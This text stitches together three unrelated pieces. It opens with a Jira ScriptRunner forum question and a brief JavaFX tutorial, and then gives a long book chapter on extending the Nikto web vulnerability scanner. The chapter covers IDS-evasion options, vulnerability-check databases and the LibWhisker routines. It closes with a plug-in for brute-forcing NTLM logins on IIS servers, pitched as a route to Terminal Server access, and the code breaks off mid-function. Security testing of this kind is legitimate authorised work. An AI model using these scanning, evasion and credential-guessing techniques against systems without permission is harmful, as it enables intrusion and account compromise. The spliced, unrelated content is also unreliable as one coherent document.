(see the attachment). Can you please tell me what's missing? javax.ws.rs.core.MultivaluedMap import javax.ws.rs.core.Response @BaseScript CustomEndpointDelegate delegate pickRemoteIssue() { MultivaluedMap queryParams -> //def query = queryParams.getFirst("query") as String def jqlQuery = "project = RCDC" def httpBuilder = new HTTPBuilder("") def response = httpBuilder.request(Method.GET, ContentType.JSON) { uri.path = "/rest/api/2/issue/picker" uri.query = [currentJQL: jqlQuery] response.failure = { resp, reader -> log.warn("Failed to query JIRA API: " + reader.errorMessages) return } } response.sections.each { section -> section.issues.each { // delete the image tag, because the issue picker is hard-coded // to prepend the current instance base URL. it.remove("img") } } return Response.ok(new JsonBuilder(response).toString()).build() } Thanks Thanos. I was able to use the sample - to setup a initilizer script to load JIRA Issues from another project into a text field as a select list. However, I need to auto-select the value from the dropdown based on the out-of-box project selection. I am now using the below script on the "Project" field change behaviour. Can you please assist in the highlighted areas? def selectedProject = getFieldById(getFieldChanged()).getValue() def jqlSearchField = getFieldByName("Subsystem") jqlSearchField.convertToSingleSelect([ ajaxOptions: [ url : getBaseUrl() + "/rest/scriptrunner-jira/latest/issue/picker", query : true, data : [ currentJql : "project = 'eRA Component Model' AND Summary ~ ${selectedProject} ORDER BY key ASC", ], formatResponse: "issue" ], css : "max-width: 500px; width: 500px", ]) I have trouble using "Project" field in behaviours. Thanks a lot in advance. Venkat.
https://community.atlassian.com/t5/Marketplace-Apps-questions/Script-Runner/qaq-p/224668
CC-MAIN-2018-17
refinedweb
682
57.87
Using our previous example on displaying a text string, we will go through the process on how we have created a Text object, setting the text color and the font of the text. The 4 lines of statement that we used are shown here: Text txt = new Text(); txt.setFill(Color.BLUE); txt.setFont(Font.font("Times New Roman", 36)); txt.setText("Hello World"); In the first line above, we create a Text object with the object name txt. As txt is now a Text object, we could make use of the methods that are associated with the Text object. The methods that we used here are setFill, setFont and setText. All these are member functions of Text object. Notice that in our import statements, we have 2 classes related to Font and Color. Font and Color are known as static classes. We do not have to declare an instance of the Color class to access its property, which is BLUE in this case. We set the color property by using Color.Blue where Color is actually the name of the class. The same goes to setting the font type where we access the font type by using Font.font(). Font is similar to the name of the class as shown in the import statement. package javafxapplication4; import javafx.application.Application; import javafx.scene.Scene; import javafx.scene.text.Text; import javafx.scene.layout.StackPane; import javafx.scene.paint.Color; import javafx.scene.text.Font; import javafx.stage.Stage; public class JavaFXApplication4 extends Application { @Override public void start(Stage primaryStage) { primaryStage.setTitle("JavaFX Program!"); StackPane stackpane = new StackPane(); Scene scene = new Scene(stackpane, 300, 250); primaryStage.setScene(scene); Text txt = new Text(); txt.setFill(Color.BLUE); txt.setFont(Font.font("Times New Roman", 36)); txt.setText("Hello World"); stackpane.getChildren().add(txt); primaryStage.show(); } public static void main(String[] args) { launch(args); } }
http://codecrawl.com/2015/03/11/javafx-setting-the-text-and-display-it/
CC-MAIN-2017-04
refinedweb
312
61.63
Is there a structure wherein I can have strings in col1, doubles in col2, integers in col structure wherein I can have strings in col1, doubles in col2, integers in col3? Theoretically, a 2d array, but that would be messy. I would suggest making each "row" an object, which has values for col1, col2, and col3, and then putting the rows in an array. That would be the cleanest solution.: Rather than using parallel arrays to store data, use a CLASS. A class might be structured something like:Rather than using parallel arrays to store data, use a CLASS. A class might be structured something like: public class MyDataStructure { // instance variables String columnOne; double columnTwo; int columnThree; // a constructor that sets each instance variable public MyDataStructure( String columnOne, double columnTwo, int columnThree ) { this.columnOne = columnOne; this.columnTwo = columnTwo; this.columnThree = columnThree; } // end constructor } // end class MyDataStructure
http://www.javaprogrammingforums.com/member-introductions/35039-array-type-structure-different-types-different-columns.html
CC-MAIN-2014-15
refinedweb
146
57.06
Arjan van de Ven schrieb:>> Hence the config option for the kernel- it's philosophy at Gentoo to >> make choices available to users how they want their systems to behave, >> even on the expense of added complexity and need to "understand" how >> things work in the first place.>> >> While I am not opposed to choice, I am opposed to having too finegrained> kernel config options. In your view, every single kernel patch would be> a config option... I much rather have config options for "important" big> changes, not for something this small. Another argument is that this> kind of userspace interface is better off being always there or never;> making this variable serves no-one.>>>> Hi again,as said, i'm not voting for getting the specific example patch into kernel source.All i came for and would like to see is the two numbers into the upstream header file to avoid future namespace clashes (as said in the original mail).I honestly don't know how to follow the discussion to implement this kind of entropy given via auxv to userland- if you (the kernel devs) think it makes sense the way you want it you as upstream devs can do it all the way you like it- i can always change it with a patch for my own needs in my own sources. I can't say anything at all about all of this because i don't know what is important from your point of view as kernel maintainers and what is not. I understand your concerns and know that we are talking from different perspectives, thus it is probably normal that our interests and technical solutions vary.However, as said, the only thing important for me is to not use "arbitrary" chosen numbers for the AT_ENTROPY1 and 2 values and later have problems when my "private" numbers suddenly are assigned to a different thing by "official" kernel devs. That would be bad for me and this is what i want to avoid in the first place.So please tell me what i can do about the requirements and the time and what the usual process is for asking how to get the numbers into the kernel so i can start using them for my own work.Thanks in advance,Alex-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at
https://lkml.org/lkml/2007/6/18/129
CC-MAIN-2017-22
refinedweb
412
61.7
Descripción This plugin integrates your website with Workshop Butler workshop management platform. It helps you to promote trainings and other events, accept registrations online, and give visitors detailed information about your trainers and workshops. It comes with five default themes, and many options to customise it for your needs. When you add a new event or trainer to Workshop Butler, they automatically appear on your website, making the process of workshop and license management fast and easy. Languages The public pages are available in English, Spanish, French, German, Portuguese, Dutch and Norwegian. The administration panel is available only in English. Instalación - Open your WordPress dashboard - Go to Plugins -> Add New - Click Activate After the activation, go to Settings -> Workshop Butler, enter your API key and click Save. Then you can open yourwebsite.com/schedule to see the list of events. During the activation, the plugin adds five pages: - Schedule (/schedule) contains the event schedule - Event (/schedule/event) hosts the detailed information of each event - Trainer List (/trainer-list, containing the list of all trainers - Trainer (/trainer-list/profile) for the trainer profiles - Registration (/registration) for the event registration You can change them later. Can I use the plugin without having a Workshop Butler account? No. However, you can easily register for a free trainer account Can I use my own theme? Yes. Workshop Butler plugin for WordPress comes with a number of options for customization. What to do if I found a bug? Please, open an issue here What to do if I have a question? Please, open an issue here Reseñas No hay valoraciones para este plugin. Colaboradores y desarrolladores «Workshop Butler» es un software de código abierto. Las siguientes personas han colaborado con este plugin.Colaboradores Traduce «Workshop But - Fix an issue with tax exempt for brands integration 3.1.5 - Disable theme customizer integration 3.1.4 - Update compatibility up to WP 5.9 3.1.2 - Add support for «jS» and «dS» formats for schedule dates 3.1.1 - Fix «Confirmed» label on an event page 3.1.0 - Add the Estonian language - Add VAT calculation for ticket price 3.0.3 - Fix schedule shortcode elements option and schedule time formatting 3.0.2 - Fix schedule filters for old templates - Use default jQuery - Bump lower supported WP version to 5.5 3.0.1 - Fix default filters for schedule 3.0.0 - Completely new template system - New templates layout 2.14.0 - Add PayPal payments 2.13.9 - Fixes undefined property error notice 2.13.8 - Fixes a JS error on the registration form when jQuery doesn’t work in some rare cases - Adds filter by multiple categories. 2.13.7 - Rolls back the changes from the previous fix and uses another way to fix a fatal error with Buddyboss 2.13.6 - Fixes a fatal error happening on some pages when Buddyboss is installed 2.13.5 - Fixes translations and support for Macedonian, Hungarian and Hebrew languages 2.13.4 - Fixes a critical error visible in the logs but not affecting any behaviour 2.13.3 - Fixes registration on canceled event - Fixes Yoast SEO compatibility - Fixes an issue with incorrect featured event highlighting 2.13.2 - Fixes an issue with incorrect error handling from server - Fixes an issue with registration in IE 2.13.1 Fixes a small translation issue in German language 2.13.0 - Adds badgesattribute to wsb-trainer_listshortcode which shows trainers who have at least one of the given badges (use badge ids for that) 2.12.0 - Fixes a bug with incorrect Hebrew language - Adds new wsb_schedule_languageshortcode which renders the column of workshop’s languages - Adds support for customizable query parameters for schedule - Reports a bit more data (request ID, user agent) on errors - Adds support for featured events in schedules and on-page event lists - Fixes the output of ordered/unordered lists in event description and trainer profile - Adds a new element – Next eventblock. For now, it includes only button which contains the link to the next event (either any event or from specified category/event types) 2.11.2 Fixes «mailto» button on the trainer’s page 2.11.1 Fixes [wsb_trainer_list_rating] shortcode which didn’t show trainer’s rating 2.11.0 - Improves the output of event dates - Adds only_featuredparameter to wsb_scheduleto show only featured workshops - Fixes an issue with incorrect workshop dates in some border cases - Adds two new shortcodes for wsb_schedule: wsb_schedule_dateand wsb_schedule_time - Improves the output for timezone abbreviations which have no abbreviations (adds GMT before them) - Adds failed request logging with the ability to switch it off 2.10.0 - Fixes an issue with non-working registration form for free events - On the trainer’s profile, the newest past events are shown, not the oldest ones - Improves support for multiple locales 2.9.0 - Adds ‘truncate’ parameter to wsb_schedule_title (only for ‘tile’ view). By default, 60. Set to 0 or false to remove completely. … is added when truncate is on. - Adds ‘target’ parameter to wsb_event_registration_button. By default, set to ‘_self’. Possible values are the same as for ‘target’ attribute for HTML link . - Adds support for optional start/end dates in ticket prices - Fixes deactivation behaviour for the plugin (do not remove settings anymore) - Adds complete settings removal when the plugin is uninstalled - Sends a bit more statistics on each API request 2.8.4 Fixes a random bug when workshop ID wasn’t retrieved from a query string (probably erased by WordPress) 2.8.3 Improves handling of secure requests for reverse-proxy website 2.8.2 Fixes a bug in Safari preventing card payments 2.8.1 Fixes an incorrect Stripe key 2.8.0 Adds support for card payments (card payments must be activated in Workshop Butler) 2.7.6 - Fixes the output of future/past events on a trainers’s page: remove private workshops from the list - Improves the handling of server errors during the registration process 2.7.5 - Fixes the output for future/past events on a trainer’s page 2.7.4 - Fixes a bug preventing sending a correct ticket type on multiple tickets - Fixes a problem with promo code box not showing when the link is clicked - Improves the look of registration form - Fixes a bug when an external registration link did not work 2.7.3 Partially fixes an issue when an event page template is not updated 2.7.2 Fixes an issue with incomplete list of trainers and events 2.7.1 Fixes an issue prevented to update some classes in page templates 2.7.0 - Cleaner, easier-to-user registration form - Multiple smaller UI fixes - Adds two new configuration options for event page: a number of events in the sidebar and what events to show in the sidebar 2.6.0 - Two new shortcodes added to show cover image of events: [wsb_schedule_image] and [wsb_event_image] 2.5.0 - Added ‘Event Type’ option to the widget. You can show events only from the selected event type - Added ‘event_type’ parameter to ‘[wsb_schedule]’ shortcode. You can show events only from the selected event type - If there is only one ticket type, it’s selected automatically on the registration form - When a user filters workshops in the schedule, this information is saved in URL so you can share links to a filtered schedule - Improved Upcoming events widget on the event page: it shows events of an active trainer and do not show an active event 2.4.1 - Fixes a bug with the registration form 2.4.0 - Improves support for Google Analytics actions - Fixes a filter configuration on the list of trainers 2.3.1 - Fixes a price output for some locales 2.3.0 - Adds support for Norwegian language - Fixes the rendering of italic, bold, and text - G+ is removed from social sharing 2.2.4 - Fixes a bug with an incorrect country code sent to Workshop Butler. As a result, the countries of attendees were not saved correctly 2.2.3 - Fixes an incorrect array initialisation for PHP version < 5 2.2.2 - Fixes a bug preventing attendee registration when billing and/or work addresses are set as required 2.2.1 - Fixes the rendering of custom fields. Before labels for custom fields were not shown 2.2.0 - Radically improves mobile templates - Adds Trainer column to a Table layout of Schedule - Fixes a bug with timezone when workshop dates were different from the ones set by trainers - Fixes a Spanish translation 2.1.3 - Fixes another PHP 5.3 related bug 2.1.2 - Fixes a support for PHP 5.3 - Fixes a date/time formatting for one-day workshop 2.1.1 Fixes a bug with incorrect jQuery loading on some websites 2.1.0 - Adds support for WordPress 5.0 - Adds new shortcode [wsb_trainer_name] - Improves the behaviour for external event pages – the links open in new tabs. 2.0.2 - Fixes a bug when a ticket price is not showing on some websites - Moves all classes under WorkshopButler namespace to prevent name clashes 2.0.1 Fixes a bug which caused a repetitive menu item 2.0.0 Attention: The changes in this release are substantial and an additional manual setup is needed. Before proceed, read the article How to migrate from to a new WordPress plugin Meet a completely new version of our website integration widgets. It includes a huge number of modifications, and makes the process of customisation very simple. Here’s just a short list of what we added: - Powerful new settings allow you to change the layout of pages and update the styles - Support for Spanish, German, French, Portuguese and Dutch languages - Support for the list of trainers and trainer profiles - Support for the list of testimonials for one trainer - Support for a number of shortcodes and configuration settings 1.2.0 - Support for named widgets, allowing you to add many pre-configured event calendars and sidebars 1.1.0 - Support for new Workshop Butler website integration 1.0.4 - Added custom title for plugin 1.0.3 - Added theme supporting for plugin 1.0.2 - Updated a plugin description 1.0.0 - Release date: October 15th, 2016
https://es.wordpress.org/plugins/workshop-butler/
CC-MAIN-2022-33
refinedweb
1,689
55.84
Network Security Tools/Modifying and Hacking Security Tools/Writing Plug-ins for the Nikto Vulnerability Scanner From WikiContent Nikto is one of a number of open source security tools available to consultants and administrators. Nikto is a web server scanner, but it also can be used as a CGI scanner. Its purpose is to conduct a series of tests against a web server and to report known vulnerabilities in the server and its applications. The Nikto program is Perl code written and maintained by Chris Sullo. Nikto is regarded as the best in its class, which has earned it the number 16 spot in Fyodor's annual "Top Security Tools" survey, and it is mentioned in numerous books and articles. This chapter will give you an overview of the tool and explain how to extend it by writing your own code in the form of plug-ins and plug-in database entries. Installing Nikto Nik. Tip Nikto runs on a variety of operating systems, including Mac OS X, Solaris, Linux, Windows, and many others, as long as a Perl interpreter is installed on the system. Using Nikto Using Nikto is fairly straightforward. The main required arguments are the target host and port against which the scan will be conducted. If no port is specified, port 80 (the default) is used. All command-line options except for -debug, -update, -dbcheck, and -verbose are available by using the first letter as a short-form option. Execute the program with no arguments, and a description of all available options along with module-loading warning messages will be displayed. You'll see the warning messages if support modules such as SSL are not installed correctly. Here are the options you have available to you: - Cgidirs - This allows you to manually set a single CGI directory from which to start all tests. It overrides any of the CGI directory entries made in config.txt. Additionally it accepts the values all or none. all forces the core plug-in to run checks against every CGI directory specified in config.txt. none runs all CGI checks against the webroot (/). - cookies - This prints out cookies if the web server attempts to set them. - evasion+ - LibWhisker lets you apply up to nine different URI obfuscation techniques to each request, with the goal of bypassing intrusion detection systems (IDSes) that do strict signature matching and no URI normalization/conversion. After seeing the evasion options by running Nikto with no arguments, specify as many of these numeric options as you want and they will be applied. For example: $perl ./nikto.pl -h -e 3489 - findonly - This does a port scan only; no other checks will be run. If you are port-scanning only, I suggest you use Nmap or some other tool that is dedicated to that task. - Format - This controls the output format when the -output flag is used. Valid values are htm, csv, and txt. If this option is not used, txt will be used as the default output format. - generic - This forces all checks in the scan database to be executed, regardless of web server banner. - host+ - Use this to specify the target host or a file that contains target entries in the format domain.com:80:443. Each line should contain one entry; any other command-line options such as -ssl will be applied to all the hosts in the file. - id+ - Use this to specify HTTP Basic authentication credentials in the form username:password:realm. The realm is optional. - mutate+ - The mutate options are special, in that each integer placed in these options activates a different "conditional" plug-in. For example, by entering 13 you enable the Mutate and Enum_apache plug-ins. - nolookup - This avoids hostname DNS lookups. - output+ - This specifies an output filename. The default format is plain text. - port+ - This is the port the checks will be run against. The default is 80. - root+ - This prepends a directory to all requests. This is useful for web servers that are configured to redirect all requests to a static virtual directory. - ssl - This forces use of HTTPS. On occasion this option is unreliable. A workaround is to use Nikto in combination with an HTTPS proxy agent such as sslproxy, stunnel, or openssl. - timeout - This is the connection timeout (the default is 10 seconds). If you are on a fast link and are scanning a multitude of hosts, lowering this helps to reduce scan time. - useproxy - This tells Nikto to use the proxy information defined in config.txt, for all requests. At the time of this writing, only HTTP proxies are supported. - Version - This will print the version of all found plug-ins and databases. - vhost+ - This sets the virtual host that will be used for the HTTP Host header. This is crucial when scanning a domain that is hosted on a server virtually. To get the most coverage you should run a scan against the web server's IP, and against the domain. - debug - This enables debug mode, which outputs a large amount of detail regarding every request and response. - dbcheck - This does a basic syntax-check against the scan_database.db and user_scan_data base.db databases that the main scanning engine uses. - update - This retrieves and updates databases and plug-ins, getting the latest version from cirt.net. By default Nikto will never automatically download and install updates. It will prompt the user for acknowledgment. - verbose - This enables verbose mode. Nikto Under the Hood This section traces the logic flow of the entire Nikto program, and discusses the routines available through nikto_core and LibWhisker. The Nikto program structure is modular. Most of Nikto's actual functionality lies within external plug-ins , which you can find in the plugins/ directory where the Nikto source code was uncompressed. Tip It is a good idea to browse the source of existing plug-ins to better understand how they work. Execute the following Linux command from the Nikto root directory to generate a tag file for the source tree: find . -name "*.pl" -o -name "*.pm" -o -name "*.plugin" | xargs ctags --language-force=perl Nikto's Program Flow At 200 lines of code the Nikto.pl file is relatively small. The following paragraphs briefly discuss what the program does on a macro level. At the start of the program, you'll notice a series of global variables. To avoid namespace collisions, plug-in developers shouldn't use these variable names. Next, load_configs( ) parses the configuration file config.txt and initializes %CONFIG. Then the find_plugins( ) routine searches expected directories for the plug-in file, and sets appropriate values in %FILES. The nikto_core plug-in and LibWhisker are included with the require keyword, which makes all routines from LW.pm and nikto_core.plugin available to the rest of nikto.pl as well as to its plug-ins. The general_config() routine parses the command-line options and sets %CLI appropriately. Next, LibWhisker's http_init_request( ) initializes LibWhisker's %request with default values. The proxy_setup( ) function sets the appropriate values in %request, depending upon the proxy settings in the configuration file. The open_output() function opens a file handle for writing program output, only if an output file was specified on the command line. Next, set_targets( ) populates %TARGETS with the hostname or IP address of the target, along with specified ports. The load_scan_items( ) function loads the vulnerability checks found from servers.db, scan_database.db, and user_scan_database.db (if the file exists) into global arrays. Finally, the main loop for the vulnerability checks is reached. For each item in %TARGETS the following actions are taken: first, dump_target_info( ) displays the target information. Next, check_responses( ) verifies that valid and invalid requests return the HTTP status codes 200 and 404. In addition, this function sets any HTTP Basic authentication credentials specified by the user. The check_cgi( ) function is called to verify the existence of common CGI directories (these can be set in the configuration file). The set_scan_items() function is called to process scan db arrays and to perform macro replacement on the checks. Next, run_plugins( ) is called to execute the plug-ins on the current target host and port. Finally, test_target( ) is called to perform the actual checks found in the scan db arrays. Nikto's Plug-in Interface Nikto's plug-in interface is relatively simple. The plug-ins are Perl programs executed by Nikto's run_plugins( ) function. For a plug-in to be executed correctly, it must meet three requirements. First, the plug-in file should use the naming convention nikto_ foo .plugin, where foo is the name of the plug-in. Second, the plug-in should have an initialization routine with the same name as the plug-in. And third, the plug-in should have an entry in the file nikto_plugin_order.txt. This file controls which plug-ins run, and in what order. As an example, a line could be added to the file that simply states nikto_foo. This would call the routine nikto_foo( ) within the file nikto_foo.plugin. To keep the plug-ins portable, you should not use additional modules, but instead copy the needed code into the plug-in itself. A side effect of the chosen plug-in execution method is that the plug-ins and Nikto share the global namespace. This is why you don't need use statements to access Nikto or LibWhisker routines. This simplifies the plug-ins. Plug-in developers should make sure their variable and routine names don't conflict with any of Nikto's global variables. Existing Nikto Plug-ins Now let's examine the plug-ins that come bundled with Nikto. This will help you understand how the existing plug-ins function, before you write your own. - nikto_core - The core plug-in, as the name suggests, contains the core functionality for the main vulnerability-checking routines. These routines are available for use within the rest of the plug-ins. This plug-in and its exported routines were discussed in detail in the previous section. - nikto_realms - This plug-in checks whether the web server uses HTTP Basic authentication. If it does, it loads default usernames and passwords and attempts to guess valid credentials. - nikto_headers - This plug-in iterates through the returned HTTP headers in the server response and reports back any that are interesting from a security perspective; these include X-Powered-By, Content-Location, Servlet-Engine, and DAAP-Server. - nikto_robots - This plug-in retrieves the robots.txt file if it is available and reports back interesting entries, such as Disallow. The robots.txt file is checked by "friendly" web site crawlers to determine if it should follow any rules when crawling the web site. - nikto_httpoptions - This plug-in reviews the allowed HTTP methods, as reported via an OPTIONS request to the web server. Dangerous methods include PUT, CONNECT, and DELETE, among others. - nikto_outdated - This plug-in focuses on the Server HTTP header and uses a "best-guess" parser that determines the web server version, then checks that version against a list of up-to-date web server versions found in the outdated.db file. - nikto_msgs - As with the nikto_outdated plug-in, this plug-in focuses on the Server HTTP header but it uses the web server version to determine if there are any version-specific security warnings. - nikto_apacheusers - This plug-in checks to see if the UserDir option in Apache, or the equivalent in another web server, is enabled. If this option is enabled, you can enumerate valid system users by generating URIs such as /~root for use in requests. - nikto_mutate - This plug-in is enabled only if -m 1 is specified on the command line. If the MUTATEDIRS and MUTATEFILES variables are set in Nikto's configuration, each request is mutated three times. The first time is the standard request, the second has the MUTATEDIRS item prepended to the URI, and the third has a MUTATEFILES entry appended to the URI. You should not use this plug-in with its default settings because the mutation engine is extremely slow. - nikto_passfiles - This plug-in is enabled only if -m 2 is specified on the command line. This plug-in has an array of common password filenames such as passwd, .htpasswd, etc. It combines the filenames with common file extensions and directory names to make requests in an attempt to check for files with interesting information (usually credentials). Be aware that using this plug-in with its default settings yields more than 2,000 checks. - nikto_user_enum_apache - This plug-in is enabled only if -m 3 is specified on the command line. This plug-in guesses usernames with the same URI formatting technique as the nikto_apacheusers plug-in. It's not recommend for general use because the default generation engine is set for five-character alphabetic usernames and thus produces 11,881,376 checks. - nikto_user_enum_cgiwrap - This plug-in is enabled only if -m 4 is specified on the command line. Its logic is very similar to that of the nikto_user_enum_apache plug-in. The key difference is that this plug-in uses an enumeration technique specific to the CGIWrap program. CGIWrap is a web server extension that allows for better security by running CGI scripts as the user that created them instead of as the web server user. The plug-in generates URIs such as /cgi-bin/cgiwrap/userguess. Keeping in mind that the username generation routine is the same as in nikto_user_enum_apache, the same warnings apply. Adding Custom Entries to the Plug-in Databases A key advantage of many plug-ins is that you can extend them via their .db data driver files. The msgs, outdated, realms, and core plug-ins all use .db files as their signature database. Because each plug-in functions differently and has unique requirements for data input, the syntax of each .db file is different. The one common thread among them is that they all use the Comma Separated Value (CSV) format. All of the Nikto plug-ins use the parse_csv( ) routine from the core plug-in to convert each line of the .db file into an array. .db Files Associated with the nikto_core Plug-in The nikto_core plug-in uses servers.db to categorize a target based on its Server: header. The file contains categories of web servers and regular expressions that map to them. To limit testing time and false positives, Nikto uses the function get_banner() to retrieve the Server: banner and then sets the appropriate server category using the function set_server_cats( ) . The scan_database.db file and the optional user_scan_database.db file are the driver files for the main checks launched from nikto_core.plugin and they share the same syntax. The line syntax is as follows: [Server category], [URI], [Status Code /Search Text ], [HTTP Method], [Message] "iis","/","Length Required","SEARCH","WebDAV is installed.\n"; "cern","/.www_acl","200","GET","Contains authorization information" "generic","/cfdocs/examples/httpclient/mainframeset.cfm","200!not found","GET", "This might be interesting" The first entry of the first line is the server category—in this case, iis. Once the category has been determined, only checks of this type will be run against it, unless the -generic command-line option is specified. This will reduce total scan time and false positives. The second entry of the first line is the URI requested. The third entry is the text Nikto will look for in the response. If the text is found, the check will register as a vulnerability and will display the appropriate output to the user. You can specify both the status code and search text using ! as the separator. The fourth entry is the HTTP method that will be used in the request. Typically this will be GET or POST. The fifth entry is the message Nikto should print if the check succeeds. Note that the check on the first and second lines is similar, except that on the second line the "search text" field is an HTTP response code. If Nikto sees a number in this field, it assumes the number is a response code. The check succeeds if the actual response code matches the check. You can see a variation of this in the "search text" entry on the third line. The third line specifies a response code to look for and search text to match against. The check will be successful if the response code is 200 and the returned page does not contain the string not found (case-sensitive). Look at the following log of the third check. Because the response code was 404 and not 200 the check is known to have failed. REQUEST: ************** GET /cfdocs/examples/httpclient/mainframeset.cfm HTTP/1.1\r\n Host: 192.168.0.100\r\n \r\n RESPONSE: ************** HTTP/1.1 404 Not Found\r\n Date: Tue, 08 Jun 2004 23:58:30 GMT\r\n Server: Apache/1.3.19 (QNX) PHP/4.1.3 mod_ssl/2.6.4 OpenSSL/0.9.6c\r\n Transfer-Encoding: chunked\r\n Content-Type: text/html; charset=iso-8859-1\r\n \r\n <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<HTML><HEAD>\n< TITLE>404 Not Found</TITLE>\n</HEAD><BODY>\n<H1>Not Found</ H1>\nThe requested URL / cfdocs/examples/httpclient/mainframeset.cfm was not found on this server.<P>\n</BODY></HTML>\n outdated.db for the nikto_outdated Plug-in The nikto_outdated plug-in, as the name suggests, checks the version of the web server as given by the Server: header to determine if it is outdated. It does this by comparing the retrieved banner to the versions in the outdated.db file. It's important to note that web servers vary in terms of how they announce themselves in the Server: header. It's easy for us to see that Apache/1.3.26-WebDav and apache-1.3.26 php/4.3.1 represent the same version of the Apache web server, but it's challenging for the scanner to see this. The nikto_outdated plug-in tries to take a best guess as to what the separators are (a space, /, -, etc.) and then translates alphabetic characters to their equivalent ASCII ordinals (as in the debug output a few paragraphs down). The syntax of outdated.db is as follows: [Web Server Banner], [Current Version], [Display Message] "Apache/","Apache/2.0.47","@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Apache 1.3.28 is still maintained and considered secure." The first entry is the string the plug-in matches on to determine if the current line's checks should be run. The second entry is the version of the web server that is considered up-to-date. The third entry is the message displayed if the version is outdated. The @RUNNING_VER and @CURRENT_VER tokens will be replaced with the strings that their names suggest. The logic flow of the plug-in is best illustrated by putting the program in debug mode using the -debug flag. The debug output shows the plug-in has correctly chosen the / character as a separator to be used in parsing the web server banner. Then it goes on to parse out the version (what Nikto calls numberifcation), and finally it checks major and minor versions of the running version on the target to the Current Version and prints out the Display Message string if the version is outdated. D: nikto_outdated.plugin: verstring: Apache/, sepr:/ D: nikto_outdated.plugin: $CURRENT:apache/2.0.47:$RUNNING:apache/1.3.29: D: nikto_outdated.plugin: $CURRENT:2.0.47:$RUNNING:1.3.29: (after numberifcation) D: nikto_outdated.plugin: major compare: $CUR[0]:2: $RUN[0]:1: + Apache/1.3.29 appears to be outdated (current is at least Apache/2.0.47). Apache 1.3.28 is still maintained and considered secure. realms.db for the nikto_realms Plug-in The realms.db file contains the entries to drive the attacks that the nitko_realms plug-in attempts against a server's Basic Auth HTTP authorization. The syntax is as follows: [Realm], [Username], [Password],[Success Message] "@ANY","test","test","Generic account discovered." "ConfigToolPassword",,,"Realm matches a Nokia Checkpoint Firewall-1" The plug-in checks to see if the realm is matched, and if so, it attempts to authenticate using the Username and Password. On success the message is displayed to the user. The entry @ANY is a wildcard that matches all realms. server_msgs.db for the nikto_msgs Plug-in The nikto_msgs plug-in performs matches on the web server banner. If a certain version is found, it will display the corresponding message. One of the benefits of the plug-in's .db file syntax is that it uses Perl regular expressions to match on the banner. The syntax for server_msgs.db is as follows: [Web Server RegEx], [Success Message] "Apache\/2\.0\.4[0-5]","Apache versions 2.0.40 through 2.0.45 are vulnerable to a DoS in basic authentication. CAN-2003-0189." Using LibWhisker LibWhisker is the Perl module Nikto relies on for its core functionality. At the time of this writing, the current Nikto version ships with LibWhisker 1.7. In general you will not need to use more than a handful of LibWhisker routines. Keep in mind they are all available and have very powerful features, such as crawling, NT Lan Man (NTLM) authentication support, hashing, and encoding. The names of the 69 exported routines are detailed here to help you understand the kind of functionality they provide. You can generate a very detailed manual of these routines from LibWhisker itself. To do this, uncompress LibWhisker and run the following commands: $cd libwhisker-1.8/scripts/ $perl func2html.pl < ../LW.pm > LW.pod.htm Here are the routines LibWhisker exports: In addition to the LibWhisker routines, plug-in developers can also use routines provided by the nikto_core plug-in. Many of these routines are meant for one-time use or for internal use only. Here are the common routines from LibWhisker and nikto_core that are frequently used by the existing plug-ins, along with a brief description of each: - fetch - This takes two parameters, and an optional third parameter. The first parameter is the full path of a file that is to be requested. The second parameter is the HTTP method to use for the request. The optional third parameter is any POST data for the request. The routine makes an HTTP request and returns two scalars. The first returned value is the response code number and the second is the data returned. This routine will make the request using the LibWhisker parameters set by Nikto, so the host that is currently being scanned is where the request will be sent. - parse_csv - This takes a single string of comma-separated values as a parameter and returns an array of those items without the commas. - nprint - This takes one required parameter, and one optional parameter. The required parameter is the string to send to output (output depends on what was specified on the command line). The optional parameter prints only if Nikto is run in verbose or debug mode. - char_escape - This takes one string parameter, escapes all nonalphanumeric characters in it with the \ character before them, and returns the result. If you need a higher level of control over the HTTP requests, you can use the LibWhisker routines. The most commonly used routines for plug-ins are summarized next. The LibWhisker request hash $request{'whisker'} has many values you can set to control the request. These should be returned to their original values if they are changed within a plug-in. See the nikto_headers plug-in as an example of how to do this correctly. - LW::http_do_request - This takes two parameters: a request hash and a response hash that will be populated accordingly. An optional third parameter is a LibWhisker configs hash. The routine does the work of the actual HTTP request. It returns 0 on success and a nonzero value on error. - LW::http_fixup_request - This makes sure the request conforms to the HTTP standard. It should be called immediately prior to http_do_request. It takes the request hash as the only parameter. - LW::http_reset - This resets internal LibWhisker caches and closes existing connections. - LW::utils_get_dir - This takes in a URI as a parameter and returns the base directory, similar to the dirname command on Linux systems. - LW::utils_normalize_uri - This takes one parameter and corrects any ./ or ../ sequences to get a final, absolute URL. - LW::auth_set_header - This sets authorization information in the request hash. It takes four required parameters and one optional parameter. The first parameter is either ntlm or basic, the second is the request hash, the third and fourth are the username and password, and the optional parameter is the domain (for ntlm auth). Writing an NTLM Plug-in for Brute-Force Testing Brute-forcing is the common attack technique of repeatedly guessing credentials to authenticate to a remote server. Now that we've covered the basics of what is available for plug-in developers, it's time to create an example plug-in that you can use in a real-life network-penetration test scenario. Installations of Microsoft's IIS web server are widely deployed. IIS supports two common authentication schemes. The first is Basic authentication, which is a nonencrypted legacy form of authentication to a restricted area (the restricted area is known as a realm). The second is NTLM (NT Lan Man) authentication. NTLM authenticates against existing credentials on the Windows operating system. Our new plug-in, named nikto_ntlm.plugin, guesses credentials against this form of authentication. A possible attack strategy would be to guess NTLM credentials to the domain, and then use these credentials to access another available remote administration—i.e., Terminal Server. The benefit of this strategy is that with NTLM authentication over HTTP you can guess credentials faster than you can with Terminal Server. (In either case it is important to consider account lockout policies.) First, comment out routines that generate significant traffic. This lets you focus on the specific plug-in when looking through logs and network sniffers during testing. Starting from line 100, our new nikto.pl file that is to be used for plug-in development will look like this: dump_target_info( ); #check_responses( ); run_plugins( ); #check_cgi( ); #set_scan_items( ); #test_target( ); Our new nikto_plugin_order.txt file for plug-in development will look like this: #VERSION,1.04 #LASTMOD,05.27.2003 # run the plug-ins in the following order nikto_ntlm Now we're ready to code the new plug-in. This plug-in's algorithm is similar to the one found in the nikto_realms plug-in, so we'll use this as a model. First, the plug-in should check to see if it's useful for a particular target. Using fetch automatically fills the LibWhisker request hash with the current target host. Nikto will take care of running the plug-in if the user specifies multiple targets. Note the use of $CLI{root} because this comes into play if the user is using the -root command-line option. sub nikto_ntlm{ (my $result, my $CONTENT) = 